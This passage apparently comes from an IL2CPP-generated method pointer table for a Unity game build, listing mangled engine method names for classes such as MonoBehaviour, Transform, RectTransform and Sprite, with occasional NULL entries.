MonoBehaviour_StartCoroutine_m10C4B693B96175C42B0FD00911E072701C220DB4,
MonoBehaviour_StartCoroutine_mD754B72714F15210DDA429A096D853852FF437AB,
MonoBehaviour_StartCoroutine_m4CAFF732AA28CD3BDC5363B44A863575530EC812,
MonoBehaviour_StartCoroutine_Auto_m97F469F18612A2208D2EFDB3274DF0B4E3C9F4E6,
MonoBehaviour_StopCoroutine_mF9E93B82091E804595BE13AA29F9AB7517F7E04A,
MonoBehaviour_StopCoroutine_mB0FC91BE84203BD8E360B3FBAE5B958B4C5ED22A,
MonoBehaviour_StopCoroutine_m1DA0B9343DCDB53221A6CD707CBF0827A6FFF17F,
MonoBehaviour_StopAllCoroutines_m872033451D42013A99867D09337490017E9ED318,
MonoBehaviour_get_useGUILayout_mBCD040C678BF8521BFBAB8FD59BC566B1F5BED89,
MonoBehaviour_set_useGUILayout_m56F0C62F4B6889D7472074ECCB56EBA462285134,
MonoBehaviour_print_mED815C779E369787B3E9646A6DE96FBC2944BF0B,
MonoBehaviour_Internal_CancelInvokeAll_m53AE6F61FC17C80D4E6F247F2FC4044546C50C3A,
MonoBehaviour_Internal_IsInvokingAll_mA5F09100D0C010BD428927075C484F53ED2062DA,
MonoBehaviour_InvokeDelayed_m62CC0F5301AF54A302648EC327A7164F42DE3496,
MonoBehaviour_CancelInvoke_m7D8ECB590BDCFDF60B3CE4D080DD8E530FA3789B,
MonoBehaviour_IsInvoking_mFEBECFBEEA6E8B2BBF3D28F0EE12DF4D3B68617D,
MonoBehaviour_IsObjectMonoBehaviour_mB0B8BF666F0D42A208ADACA67DEA9838DE06198C,
MonoBehaviour_StartCoroutineManaged_m014E764B40594337F2B5AA03BFFC87DD8D4B063B,
MonoBehaviour_StartCoroutineManaged2_m55C19C5C5C65E9883E12101A46F37AB1172C73E8,
MonoBehaviour_StopCoroutineManaged_m35C1C524554F9B058538E41E0650FA71373F292D,
MonoBehaviour_StopCoroutineFromEnumeratorManaged_m81B57000F7ACB16B333800D66E8C74E7481E20B8,
MonoBehaviour_GetScriptClassName_m428B33342B759D78A638B6E383F0510F294DE285,
MonoBehaviour__ctor_m592DB0105CA0BC97AA1C5F4AD27B12D68A3B7C1E,
NULL,
NULL,
NoAllocHelpers_SafeLength_m41483EBB0590014E0643B374E0306ABDB65BC641,
NULL,
NoAllocHelpers_Internal_ResizeList_mA800014452877282A23161C2057727B0B7AFE537,
NoAllocHelpers_ExtractArrayFromList_m56D1BC9F44147722393AEE49591480CA9F1E635B,
RangeInt_get_end_m5835FBEB410CB8AC0928AEFD95728A9AD57F6C63,
RangeInt__ctor_m3CB91E79C7B5AED97E564581025B2F66778B7CBE,
RuntimeInitializeOnLoadMethodAttribute__ctor_m11E2CC84855B5C6E95A279E1A6D2342506CD9DCA,
RuntimeInitializeOnLoadMethodAttribute__ctor_mA563B1C8896C6490F88C060E13950DB600577352,
RuntimeInitializeOnLoadMethodAttribute_set_loadType_mCB29F9D9D69AB012FB797AB433AD3CFCE696AF10,
ScriptableObject__ctor_mD037FDB0B487295EA47F79A4DB1BF1846C9087FF,
ScriptableObject_CreateInstance_m986453A5542E9241E445F5F525212CF0C0BCCCBC,
NULL,
ScriptableObject_CreateScriptableObject_mE2EF43086320F9DCCEE1DE2B71F09DF34C2C643B,
ScriptableObject_CreateScriptableObjectInstanceFromType_m465D7CDD61A43D1C647E1803F7C20865347B8D18,
ScriptingRuntime_GetAllUserAssemblies_m3CD77CA324FE78FDE80F23C759F1E11D010DB554,
ScriptingUtility_IsManagedCodeWorking_mD9BE981B037F4AF13BCBE5163B917A54941D9A5E,
SelectionBaseAttribute__ctor_m6B586E58B9F8CF4D6ADF3802179F67174301F063,
StackTraceUtility_SetProjectFolder_mA96430783E940B27984E29CD1F7AA0164E93DD7C,
StackTraceUtility_ExtractStackTrace_m4413541A7935693D72659C7FAEA3AF14DADA91E8,
StackTraceUtility_ExtractStringFromExceptionInternal_m49FDC71635976B823BD8F9746A6EB09B8A46F257,
StackTraceUtility_ExtractFormattedStackTrace_m39C2E00A2984D55CDE243E0C943C5CA786DCC23F,
StackTraceUtility__cctor_m85F194351F69FC85454DE8E862961319A82DCE44,
UnityException__ctor_m2FFB2690639A7421DA5DBFC40091AB23D87EA90F,
UnityException__ctor_mF8A65C9C71A1E0DE6A3224467040765901959312,
UnityException__ctor_m9260470FF42AFD0B748D3A3EF1E4DC857C6EE7A1,
TextAsset_get_bytes_m244B31755642C9623B570FC96B9A04523B1E5178,
TextAsset_get_text_m36846042E3CF3D9DD337BF3F8B2B1902D10C8FD9,
TextAsset_ToString_m6A506652E11BF9679E6BE931EA2844035FF68923,
TextAsset_DecodeString_mEE45B5C1BB928E2E51EF0A8617C40F214812D2B5,
EncodingUtility__cctor_mFC0B683FF0A152A62F11A40F69DCA3F187E35B90,
TrackedReference__ctor_m0E498FD0AD5807B7B91CB0005170E522DAE3616A,
TrackedReference_op_Equality_m262259F41029064140AB4CDF47F28F3F99CD9D8C,
TrackedReference_Equals_m20098EB084F9E628BDA17EE946243D5D7859B94B,
TrackedReference_GetHashCode_m8EA3A2C10DDC17CC28849D41CA14B79535C90779,
UnhandledExceptionHandler_RegisterUECatcher_mE7ED82F8687FE43BF023E83EF04BB41478A26FB0,
U3CU3Ec__cctor_m5DA03BA4D3A514FA5B66755E6209E4D05E04AF3B,
U3CU3Ec__ctor_mFC700DE43CA4803F7317D49C21D6010E21E4C40D,
U3CU3Ec_U3CRegisterUECatcherU3Eb__0_0_mD21DF44CEC3DA35516DA5FC75CA8A2FF67E4E382,
Object_GetInstanceID_m554FF4073C9465F3835574CC084E68AAEEC6CC6A,
Object_GetHashCode_m3FA03DBF8CFF6584BCD22BCFDD257AED8DEB5872,
Object_Equals_m086D5CEE892DA62DEE463ACFBA493174C56EDAD0,
Object_op_Implicit_m18E1885C296CC868AC918101523697CFE6413C79,
Object_CompareBaseObjects_mE043D470C367D7EE424790E163D4EB59F2B2AF8D,
Object_IsNativeObjectAlive_mA1A54A0D1E232AEAC7A4D97ADDE65616EF11096C,
Object_GetCachedPtr_m3B66BC474B4F735F68184F00248385BAF9AF650B,
Object_get_name_mAC2F6B897CF1303BA4249B4CB55271AFACBB6392,
Object_set_name_mC79E6DC8FFD72479C90F0C4CC7F42A0FEAF5AE47,
Object_Instantiate_mA736122BD463ED7A689D245C55B114C7BD9F3660,
Object_Instantiate_m24741FECC461F230DBD3E76CD6AEE2E395CB340D,
Object_Instantiate_m84AD2E7D61D7842E705FAAA173B04F8964CABA77,
NULL,
NULL,
NULL,
NULL,
Object_Destroy_m0E1B4CF8C29EB7FC8658C2C84C57F49C0DD12C91,
Object_Destroy_mFCDAE6333522488F60597AF019EA90BB1207A5AA,
Object_DestroyImmediate_m6AAC658EE0D1AE43E4F185137E870941FBA542FD,
Object_DestroyImmediate_m8249CABCDF344BE3A67EE765122EBB415DC2BC57,
Object_FindObjectsOfType_m26A7F8711A45112BF7D30F5273B79DE1F3A7C13F,
Object_FindObjectsOfType_m9BB0460755C903B9E5BAFF3723649F28764C4356,
Object_DontDestroyOnLoad_m303AA1C4DC810349F285B4809E426CBBA8F834F9,
Object_get_hideFlags_mA08F5E41671B8C6B5073C6B9E2799BCE6E0DF7F3,
Object_set_hideFlags_mACB8BFC903FB3B01BBD427753E791BF28B5E33D4,
NULL,
NULL,
Object_CheckNullArgument_m93E646E76D8C0A9061CAD32FCA94E603893D5DD8,
Object_FindObjectOfType_mE0EB704DF7004A4FAB299C5EEE92F4B2C537C3FB,
Object_ToString_m590B13E2C40DB814E3CF9C3615952B3CC7C4B36C,
Object_op_Equality_mD3DB0D72CE0250C84033DC2A90AEF9D59896E536,
Object_op_Inequality_m4D656395C27694A7F33F5AA8DE80A7AAF9E20BA7,
Object_GetOffsetOfInstanceIDInCPlusPlusObject_m342983C256673DD1A40ADA0D56EEB7E677D7B618,
Object_Internal_CloneSingle_mAC9821862527DC97F2352A298D8C095333911238,
Object_Internal_CloneSingleWithParent_mEDF9543DC0EDB3088AE9851EA318CB4E1B27B651,
Object_Internal_InstantiateSingle_m31BF01213B7C4B54DCC925F69D6EC7175CAE7660,
Object_ToString_m31CAA90829967D51B79DC3524958E33F19E4D2E4,
Object_GetName_mF4FCA21D07EFB04CA60457B3C6C2D2E7F4365B59,
Object_SetName_m5B8C214C889B3015987383429E6CC50461BB50C3,
Object_FindObjectFromInstanceID_m17002728638FC7F9D53F8E125EC1CBB9AA213269,
Object__ctor_m2149FA40CEC8D82AC20D3508AB40C0D8EFEF68E6,
Object__cctor_m36E6427E59B2E10DCEBB6ACBEF692F4F8CB7428F,
Object_Internal_InstantiateSingle_Injected_m42B7BCD16E55615212F4D083EEC4D73CF980AA95,
UnitySynchronizationContext__ctor_m4BA1C7C04C4B82783FDC935C2C50639211B11F5C,
UnitySynchronizationContext__ctor_m3CC3D812A97540AB584CECA78B735D68FF30E4F0,
UnitySynchronizationContext_Send_mB69AAB0638FC77BD51BFA5BF7D2B0D568BBEB7F4,
UnitySynchronizationContext_Post_mD36839040EBAB66116699E68558BB8FDFF0FD834,
UnitySynchronizationContext_CreateCopy_m11E8C66F575BC1DF3F34A614E6B00D040745301A,
UnitySynchronizationContext_Exec_m7E6352CBA70E4AB14F7D50A919C3F8C22F2E977A,
UnitySynchronizationContext_HasPendingTasks_m5B62CCDDC05BCC946CB158FECC5FA6422DE1C960,
UnitySynchronizationContext_InitializeSynchronizationContext_mA8D1CAFE5270AA9F9E1BD4F69C411E6162D8C9B7,
UnitySynchronizationContext_ExecuteTasks_m6DFF66962403ECE20CF5F8B6E3F739ED17371838,
UnitySynchronizationContext_ExecutePendingTasks_m5942ABE66E17314880157FBF00C7FA59CA59C886,
WorkRequest__ctor_m78DC33ED88BF9BA29E05D2180B2ADC439132F1F5,
WorkRequest_Invoke_mBFEC6A3799BAFDE7ED840A0523D3D56160C03921,
WaitForEndOfFrame__ctor_m4AF7E576C01E6B04443BB898B1AE5D645F7D45AB,
WaitForFixedUpdate__ctor_m28D22FD61960FCD538753493FAC080DA5EC7A9E7,
WaitForSeconds__ctor_m579F95BADEDBAB4B3A7E302C6EE3995926EF2EFC,
WaitForSecondsRealtime_get_waitTime_m385602BA6C66A6169695FE9AD78F2B24F4FF8573,
WaitForSecondsRealtime_set_waitTime_m8317E2B7A2B2DC4E4A1B0CD0F9D4479294B51FB5,
WaitForSecondsRealtime_get_keepWaiting_m175C5DD180DFA38A323FA6C4C8EB058DBFC0A7CA,
WaitForSecondsRealtime__ctor_mBFC1E4F0E042D5EC6E7EEB211A2FE5193A8F6D6F,
WaitForSecondsRealtime_Reset_m44618BC7268A087CA316629EDF87282D37B6EAA4,
YieldInstruction__ctor_m23280B9DFE9C3E80554A656B4E7125BC9B2C027B,
SerializeField__ctor_mD3D7B72B71C1F3F70060E2830710F48F965C753E,
NULL,
NULL,
ComputeShader_FindKernel_m3BA5C50794FA6AF4C432E55FBBD7CB266532F659,
LowerResBlitTexture_LowerResBlitTextureDontStripMe_mEECB7042CAE059B760ABFEC12902030249248A8F,
PreloadData_PreloadDataDontStripMe_mB4D9C8C36672A400FBE7E024C47E0FD152BABA02,
SystemInfo_get_operatingSystemFamily_mDE6CCAF0171C5ACF6944CDA947F93107B8CF1B03,
SystemInfo_get_graphicsDeviceType_m539E2B66EB19CD100050109D879AF1F55EB212E1,
SystemInfo_get_graphicsMultiThreaded_mC76999DEBFD5E2C7A90CD6E5648FF0979E3209C1,
SystemInfo_IsValidEnumValue_m0353B79800677F9CBEB837D8844391487B91B872,
SystemInfo_SupportsRenderTextureFormat_mFF17D2CC50B98C7859CE0536524C612965ACF763,
SystemInfo_SupportsTextureFormat_mB0695AD83D5244AFA9D65520E13FBC54F438A43D,
SystemInfo_get_maxTextureSize_mB4272D4D85179CEF11FF1CDB3E8F3786D10CA04E,
SystemInfo_get_maxRenderTextureSize_m3D08F5C3C22952B70E47D554546F32DC6DBBC8AA,
SystemInfo_GetOperatingSystemFamily_mD60D88E10DBCBC6149118FB8C7E734E6FF6EC532,
SystemInfo_GetGraphicsDeviceType_m2F4D696CE954BC87E13535366423A83D2FB05A45,
SystemInfo_GetGraphicsMultiThreaded_mBC96CCCFDD98BD3646B0875BF768D7F85E20BC22,
SystemInfo_HasRenderTextureNative_m75871D4023BE1BD6BBC55AD89E84F16F7F86A033,
SystemInfo_SupportsTextureFormatNative_m5FA73CAF815DCC227A609836FABFEB31BB99229B,
SystemInfo_GetMaxTextureSize_mF4A562C07D3D8965C1E69370F000F6261ECDB215,
SystemInfo_GetMaxRenderTextureSize_mFD35E2EFF8B631FCDFC1ABD32C044DABBC680B4D,
SystemInfo_IsFormatSupported_m0F5051D3999D87A45F6CD5C80E6041F0B0C4C1E7,
SystemInfo_GetCompatibleFormat_m6DBEB93E6E38DEECADE82E749DC5EA43525F0B8E,
SystemInfo_GetGraphicsFormat_m710FF436E84974C7FF457EEB584ACBDDC27294AE,
Time_get_time_m0BEE9AACD0723FE414465B77C9C64D12263675F3,
Time_get_deltaTime_m7AB6BFA101D83E1D8F2EF3D5A128AEE9DDBF1A6D,
Time_get_unscaledTime_m99A3C76AB74B5278B44A5E8B3498E51ABBF793CA,
Time_get_unscaledDeltaTime_m89252D23CC5AA295CFA4EB2BCB417A831AC51652,
Time_get_fixedDeltaTime_mD7107AF06157FC18A50E14E0755CEE137E9A4088,
Time_get_maximumDeltaTime_m3684B50F11BD53F56837D2B942DB2E48F0D1C474,
Time_get_timeScale_m99F3D47F45286D6DA73ADB2662B63451A632D413,
Time_set_timeScale_mD6CAA4968D796C4AF198ACFB2267BDBD06DB349C,
Time_get_frameCount_m88E5008FE9451A892DE1F43DC8587213075890A8,
Time_get_realtimeSinceStartup_mB49A5622E38FFE9589EB9B3E75573E443B8D63EC,
TouchScreenKeyboard_Internal_Destroy_mA5C9DB308B5E6B2DE666CDD495DD2487CF5B1B72,
TouchScreenKeyboard_Destroy_m8B3C649CE02C77170A0F41D8EEF6E7465F8B9CAD,
TouchScreenKeyboard_Finalize_mCAFC1635D50B4AF9EEBFB0A5DC1D5027A2FEAA6B,
TouchScreenKeyboard__ctor_mA0C6FA07182A13B8F3F62731B94CAAD83F340861,
TouchScreenKeyboard_TouchScreenKeyboard_InternalConstructorHelper_m63AEA584D8F832F046664020316D1A3C0093197F,
TouchScreenKeyboard_get_isSupported_m92B6B1AA9E27823643C6936BDEC7FA5A2DFAD4BF,
TouchScreenKeyboard_get_disableInPlaceEditing_m410BD79B5F274B74AF4098A43202A67EE01C775F,
TouchScreenKeyboard_get_isInPlaceEditingAllowed_m50508245FF28310EA21DF21848FD3C2948801917,
TouchScreenKeyboard_IsInPlaceEditingAllowed_m914DA456BAF3F6A2DFA8108F39D48DE5AF2BFB18,
TouchScreenKeyboard_Open_mBBA9483C2F0E0AA0DF9BB13EE43697A1A23E10F5,
TouchScreenKeyboard_Open_mD2914D3CB23CA8825EC0241F81D09F551DF90445,
TouchScreenKeyboard_get_text_m74593E81B017446204A9DB1F7359922A2C005B1E,
TouchScreenKeyboard_set_text_m0A8AA05F4D9D27E8764955F0041452145B6C6FBB,
TouchScreenKeyboard_set_hideInput_m705D3D8A9B80346B7BDA63CF5C7F00D5249B8AEF,
TouchScreenKeyboard_get_active_mB22402FB9E56D3F652DA785F01E504A530FF8775,
TouchScreenKeyboard_set_active_m4382D57F87E4C86B59864E86BE93A8A2A474B7C2,
TouchScreenKeyboard_get_status_mCC466FDEC7E1913D8585ABA7F048FC198CB19504,
TouchScreenKeyboard_set_characterLimit_mCD8F3BC047EF2515272A689368CF3678A419B854,
TouchScreenKeyboard_get_canGetSelection_m340ACEFDB9609DEED4FE7D451A4DCCC1024F767A,
TouchScreenKeyboard_get_canSetSelection_m6CD6C069A9FEF91CC8014B877EB057ECF598EDF9,
TouchScreenKeyboard_get_selection_m1D44C9A8D4EA91F61706F048ED318E537DC46AB2,
TouchScreenKeyboard_set_selection_mC27C2948118086822A151118C379FAAF692DB2DF,
TouchScreenKeyboard_GetSelection_mF42EEF768DBF3EB86DC9A81E240DE0817D8BEBD1,
TouchScreenKeyboard_SetSelection_m3BF4C9BFCA4B489D9D74986C458B4D4EB02D63DD,
Pose__ctor_m15CA45808A2BBF1956E836D22C387FAB80BED051,
Pose_ToString_m4F33190911B86A9B72CA59D6AF3C633569CDE6D2,
Pose_ToString_m8C3203B81EB15980F16E07C63B6FBBEECE50A6EF,
Pose_GetTransformedBy_m8B18A1ED205791F95CDC1D1F2A08A42D6DA02CBF,
Pose_GetTransformedBy_mB4C9FECEC5701B761A0E8CB2A8BC76D8E2FFDFCF,
Pose_get_forward_m510527153754B6C2B2CDFDEE25D7168E3C82372A,
Pose_get_right_m8518E7BCEB74B9798BADB001B9E38756CC35ECFE,
Pose_get_up_m5431E350242BEBB0CD7B0AAF9DC9468DC6DDFE5C,
Pose_get_identity_m523758317678304723B886B84FEFC973E9FE1BBE,
Pose_Equals_mE6D1524E4DDAAF86BF685A00FE9DCE0908A2A9D6,
Pose_Equals_m31979E7A46252DBB620F4A0EA3BDBA61782DA498,
Pose_GetHashCode_mDD6C48FABC18795F04F82D42DFCBC916C0C6CCDB,
Pose__cctor_mF12B7A4A66CB5AC677C7D652685DCC9FE1EE1715,
DrivenRectTransformTracker_Add_mC0CE417831BF58E6DA81770CE5E2A99B142EEFEC,
DrivenRectTransformTracker_Clear_m9A7F5130E4007F70B14AB1FF13A2997C073A64EE,
RectTransform_add_reapplyDrivenProperties_mE69B443497A08D0A958E304FE23AC455A43A7132,
RectTransform_remove_reapplyDrivenProperties_mC4A73D2AA625A6108CEA35EDE218B42A7EB26D2E,
RectTransform_get_rect_mC82A60F8C3805ED9833508CCC233689641207488,
RectTransform_get_anchorMin_mD85363930BE38EC188F933B9F4D58320CAB72F03,
RectTransform_set_anchorMin_m931442ABE3368D6D4309F43DF1D64AB64B0F52E3,
RectTransform_get_anchorMax_mEF870BE2A134CEB9C2326930A71D3961271297DB,
RectTransform_set_anchorMax_m52829ABEDD229ABD3DA20BCA676FA1DCA4A39B7D,
RectTransform_get_anchoredPosition_m38F25A4253B0905BB058BE73DBF43C7172CE0680,
RectTransform_set_anchoredPosition_mF903ACE04F6959B1CD67E2B94FABC0263068F965,
RectTransform_get_sizeDelta_m822A8493F2035677384F1540A2E9E5ACE63010BB,
RectTransform_set_sizeDelta_mC9A980EA6036E6725EF24CEDF3EE80A9B2B50EE5,
RectTransform_get_pivot_mA8334AF05AA7FF09A173A2430F2BB9E85E5CBFFF,
RectTransform_set_pivot_m79D0177D383D432A93C2615F1932B739B1C6E146,
RectTransform_get_anchoredPosition3D_mE2E0547DCA8921F42B5C666E562E6A59B4894CDA,
RectTransform_set_anchoredPosition3D_m214FBDBA019743FAED8FA03857475073AA0539C4,
RectTransform_get_offsetMin_mD02BE5256DADAF02CEEF99214C4E80478CD5287B,
RectTransform_set_offsetMin_m07F38B4105C7CA9CC9FBDC9ED0DB008602880AB9,
RectTransform_get_offsetMax_m6A51C62A2C69780EFD879D3CFE4EE2CBF4AD3D73,
RectTransform_set_offsetMax_m5514D09D86516F2C0E25FA6D11A3A4274D3D002D,
RectTransform_ForceUpdateRectTransforms_m031DD32EFE51B667D300E19009EFD5A7CA9119D1,
RectTransform_GetLocalCorners_m18B3E5ED5EB24AD46279199A134CD7F218D3DD11,
RectTransform_GetWorldCorners_m6E15303C3B065B2F65E0A7F0E0217695564C2E09,
RectTransform_SetSizeWithCurrentAnchors_m53A04549B7687A1DEA2C7484E56D89809390CE44,
RectTransform_SendReapplyDrivenProperties_m4CB0E4A4F2E19CF40B008D9F25A477D18B2D22BE,
RectTransform_GetParentSize_m462044ABB7282640CCC3929A7BC3FC5609C30C42,
RectTransform_get_rect_Injected_m2CAD7BD1A157125337831D705F8953CB43EFCA22,
RectTransform_get_anchorMin_Injected_mA00B0680244E546BE0C7F715CD27BF15708F33F0,
RectTransform_set_anchorMin_Injected_m062070AA530E9DB918780A05DA5D1A7813594696,
RectTransform_get_anchorMax_Injected_m33D2FB73C038385395F18D4B75C090476D08F5E0,
RectTransform_set_anchorMax_Injected_mFD5947257451DAF1230D993A794DA690915443A5,
RectTransform_get_anchoredPosition_Injected_m101611A28C40B0E8ABE9983AE9ADC26940A2F9D7,
RectTransform_set_anchoredPosition_Injected_m9B719BB4C1D0E4EDE750CB93E19251DA94573F8A,
RectTransform_get_sizeDelta_Injected_mB107881782C0DFF99C0EC61A4D423FB3C91D5405,
RectTransform_set_sizeDelta_Injected_m3690D9F545C7C324591F81934046370DF7F1702E,
RectTransform_get_pivot_Injected_m1D193D87AE52D7BCF41990B13ADF1A807928289F,
RectTransform_set_pivot_Injected_m9693DF374A51072B4804362B6E7E065BD4A5B48C,
ReapplyDrivenProperties__ctor_mC06AEE119C82C068873EE368C7C8DBE9CAD28949,
ReapplyDrivenProperties_Invoke_m3440A5F41B8B52D671A1C26356CB20CF8E7AC39A,
Transform__ctor_mB597BB13F66ADC3B8A3D45A2ABDEC8C02B421B93,
Transform_get_position_m69CD5FA214FDAE7BB701552943674846C220FDE1,
Transform_set_position_mA1A817124BB41B685043DED2A9BA48CDF37C4156,
Transform_get_localPosition_mA9C86B990DF0685EA1061A120218993FDCC60A95,
Transform_set_localPosition_mDE1C997F7D79C0885210B7732B4BA50EE7D73134,
Transform_get_eulerAngles_mCAAF48EFCF628F1ED91C2FFE75A4FD19C039DD6A,
Transform_set_eulerAngles_m9F0BC484A7915A51FAB87230644229B75BACA004,
Transform_get_localEulerAngles_m358AA9AE8FA24FD1BB7842D231C8644D1C2910C6,
Transform_set_localEulerAngles_m0458551662A1A51FDCA4C0417282B25D391661DF,
Transform_get_up_mE47A9D9D96422224DD0539AA5524DA5440145BB2,
Transform_get_forward_mFCFACF7165FDAB21E80E384C494DF278386CEE2F,
Transform_get_rotation_m32AF40CA0D50C797DA639A696F8EAEC7524C179C,
Transform_set_rotation_m61340DE74726CF0F9946743A727C4D444397331D,
Transform_get_localRotation_mD53D37611A5DAE93EC6C7BBCAC337408C5CACA77,
Transform_set_localRotation_mAB4A011D134BA58AB780BECC0025CA65F16185FA,
Transform_get_localScale_m804A002A53A645CDFCD15BB0F37209162720363F,
Transform_set_localScale_mBA79E811BAF6C47B80FF76414C12B47B3CD03633,
Transform_get_parent_m65354E28A4C94EC00EBCF03532F7B0718380791E,
Transform_set_parent_m9BD5E563B539DD5BEC342736B03F97B38A243234,
Transform_get_parentInternal_mADE30238BECA9CDE15FB84E208FB5C6FDC31C14E,
Transform_set_parentInternal_m7AC9FA19DF51534D5E83CB8B495CDC11BA17E979,
Transform_GetParent_m0DDE14F6AA36850AAEB05B13AB8B18CB02BA875B,
Transform_SetParent_m6677538B60246D958DD91F931C50F969CCBB5250,
Transform_SetParent_m9BDD7B7476714B2D7919B10BDC22CE75C0A0A195,
Transform_get_worldToLocalMatrix_mB633C122A01BCE8E51B10B8B8CB95F580750B3F1,
Transform_get_localToWorldMatrix_m5D35188766856338DD21DE756F42277C21719E6D,
Transform_SetPositionAndRotation_m418859BF59086EEAA084FFD6F258A43FAB408F5A,
Transform_RotateAroundInternal_m320F8F4AE36A0D2E45953044466F2C213F1791D5,
Transform_Rotate_m683E67853797040312868B69E963D0E97F433EEB,
Transform_RotateAround_m489C5BE8B8B15D0A5F4863DE6D23FF2CC8FA76C6,
Transform_LookAt_mBD38EDB5E915C5DA6C5A79D191DEE2C826A9FC2C,
Transform_Internal_LookAt_m336FFC351DF1537B11EE28EB7B6161880949F3DD,
Transform_TransformDirection_m9BE1261DF2D48B7A4A27D31EE24D2D97F89E7757,
Transform_InverseTransformDirection_m69C077B881A98B08C7F231EFC49429C906FBC575,
Transform_TransformPoint_m05BFF013DB830D7BFE44A007703694AE1062EE44,
Transform_InverseTransformPoint_m18CD395144D9C78F30E15A5B82B6670E792DBA5D,
Transform_get_childCount_mE9C29C702AB662CC540CA053EDE48BDAFA35B4B0,
Transform_SetAsFirstSibling_mBE0D0E76099F829466DC2FBD71ACFCF3C8EC03BD,
Transform_FindRelativeTransformWithPath_m8A3198609EE1F59E22D2835D9B37F5BB7837EC7D,
Transform_Find_m3087032B0E1C5B96A2D2C27020BAEAE2DA08F932,
Transform_get_lossyScale_mFF740DA4BE1489C6882CD2F3A37B7321176E5D07,
Transform_IsChildOf_mFE071BE1E775E825401FE0A9B9BE49E39D256CEA,
Transform_get_hasChanged_m570B3328E80AA338FF074A5C208500E98E440795,
Transform_set_hasChanged_mCE980898F6D52F81E7E6B772DCA89E13A15870AE,
Transform_GetEnumerator_mA7E1C882ACA0C33E284711CD09971DEA3FFEF404,
Transform_GetChild_mE686DF0C7AAC1F7AEF356967B1C04D8B8E240EAF,
Transform_get_position_Injected_mC69C78EAC69F2912B161B5710E69F7D3DC30C815,
Transform_set_position_Injected_mD8E9699EA5FEBA7817BBBCB72F62BFDD26C14E33,
Transform_get_localPosition_Injected_m4EA29DEBBB27D41E17E6F7469217B50B7594DF22,
Transform_set_localPosition_Injected_mB0AC6C9E6298454212FD390CB010ED9F5B0B075A,
Transform_get_rotation_Injected_m6532D51417F17B804F56FC809B833F3BE524F0FC,
Transform_set_rotation_Injected_m0CC3E1F4A5E72DC8B5496E9248064C91BE70C20C,
Transform_get_localRotation_Injected_m1597F48A85A1F4FFDC4597B66906CC45A0F3A1A1,
Transform_set_localRotation_Injected_m7F19BC3A69E968FF240368F65E095082A9253B53,
Transform_get_localScale_Injected_m39985DA5D17EF46D4E8858AA98AF498BCC8A99D9,
Transform_set_localScale_Injected_m4ECD0F3FCC76D0B0FE5CE13E8B4BBB06489C44F2,
Transform_get_worldToLocalMatrix_Injected_mDBC9452FF28DF93AA1F7DF84AF1526F08E160963,
Transform_get_localToWorldMatrix_Injected_m17F83E29C6BC4F3C9891D9F7FF6F2059E09BB21D,
Transform_SetPositionAndRotation_Injected_m1378C65BD26A5C2C235CBDC7F36988E30485ECC3,
Transform_RotateAroundInternal_Injected_m7A30E4B3DE1D76B35288EEB6625EFAE5433970B6,
Transform_Internal_LookAt_Injected_m4B931A0A76B0F7E214E223B6DDBAAE0D0D7375E9,
Transform_TransformDirection_Injected_m3AC04BE74AF474A446E6AD65B1C086E30373A214,
Transform_InverseTransformDirection_Injected_m153CC319086000795C1B0A2B5D52CF04D43DCDDE,
Transform_TransformPoint_Injected_mC39341E3D842D1AEAF3DE2496BD9CCDE6087D65E,
Transform_InverseTransformPoint_Injected_m6F7266D1FD453F86081B7286C0848DF8F32593A6,
Transform_get_lossyScale_Injected_mDCE0BE28BAC6A6A89056535B481A6F84C36E8F68,
Enumerator__ctor_m83A956CC6A8C1F2318C7660553BAD2D2B25AD71A,
Enumerator_get_Current_m4732420B5A80C615B7CA373E750542E7F91D93DF,
Enumerator_MoveNext_mCC9D1D19DCDF3F54E1FFC2798D073C01C202D984,
Enumerator_Reset_m91311F4F60075A13C6B8A27BC2856B37DC18A63E,
SpriteRenderer_InvokeSpriteChanged_m105236F9C9637A421F96627823413A679319AFB8,
SpriteRenderer_set_sprite_m7B176E33955108C60CAE21DFC153A0FAC674CB53,
SpriteRenderer_get_color_mF19DA1B83ABD9A825127D4FBED9A111FE52F1F52,
SpriteRenderer_set_color_mB0EEC2845A0347E296C01C831F967731D2804546,
SpriteRenderer_get_color_Injected_m03948A0B439D830625AE56E44F3532E5BDB8C766,
SpriteRenderer_set_color_Injected_m57BA74C4EA48105B360D2DA91158D5235E9B4CE9,
Sprite__ctor_m14DB77A0955914B9B8D8189BB1A6B190B3CCF919,
Sprite_GetPackingMode_m281821E0A6129D699F445A0CCFE7FE0C3DBFE0E8,
Sprite_GetPackingRotation_mE9EBA99C7A1F3BCED26BCFB086C136CC1A4358E9,
Sprite_GetPacked_m020A62AD57E08E1E3AF4F9FF20A77A7E80052684,
Sprite_GetTextureRect_m8E30C1D33B201FBDFF99C0DCEA634BD6AFC551B0,
Sprite_GetInnerUVs_m68A07E15B8D8F07E33559998000B524B54E1951A,
Sprite_GetOuterUVs_m0239F5571EA1AE399B426DE9362EEAC73A3ECC42,
Sprite_GetPadding_mF346EAFF67C810A108E64366EB5CB3CB2E01D066,
Sprite_CreateSprite_mF097AD2D5CC23805EFE71A9929CF2562C74E0DB3,
Sprite_get_bounds_m042F847F6C5118E6B14A3F79A1E1C53E7DFBF452,
Sprite_get_rect_m2D85032EBEDC505E346E49291B8816BDB18DF625,
Sprite_get_border_m024C8361A808BF597EC6E1849AADDA9C756B459F,
Sprite_get_texture_mEEA6640C1B5D38F84CB64C775B201D7D9F48E045,
Sprite_get_pixelsPerUnit_m5A5984BC298062DF4CD2CB3E8534443FFCF31826,
Sprite_get_associatedAlphaSplitTexture_mBD0221BDF9855712C681C4DDCAD4EFA6EE614FDB,
Sprite_get_pivot_mDFC0A205317DB2F3B6C720B8A5BE1C27D01C1D44,
Sprite_get_packed_m6B6B98A3891B350711499532C07F8D393AAB868E,
Sprite_get_packingMode_m26DD01B9EC3E832120B4AFB3090F300ACC864A8A,
Sprite_get_packingRotation_m3FD3489CC43013B2D5228AEB1ED8099E6C5B1D10,
Sprite_get_textureRect_m83CAD4AD2F41C02FBE447EBAB92C2AC76EB46D25,
Sprite_get_vertices_m2584A7F59A8E8362F16E0DDA4CC25A1EDF8D1D31,
Sprite_get_triangles_m5D2A3D916814891FF5DF236D8A2D72C89A66EFD4,
Sprite_get_uv_mAD4DAE6EAEC23340B69D0991FA4D8E72C6CA62FF,
Sprite_Create_m77EEA5081AD2BAD0FF5409BD41E383D9A4AA7083,
Sprite_Create_mDC3D234BAAAF10910F340FAE925AFACE505246B8,
Sprite_Create_m698BC6F4C2416760480C6F94EBEF9922858EF833,
Sprite_Create_mF6520A54A2CB06749E057DC5175BB8D13419C7C5,
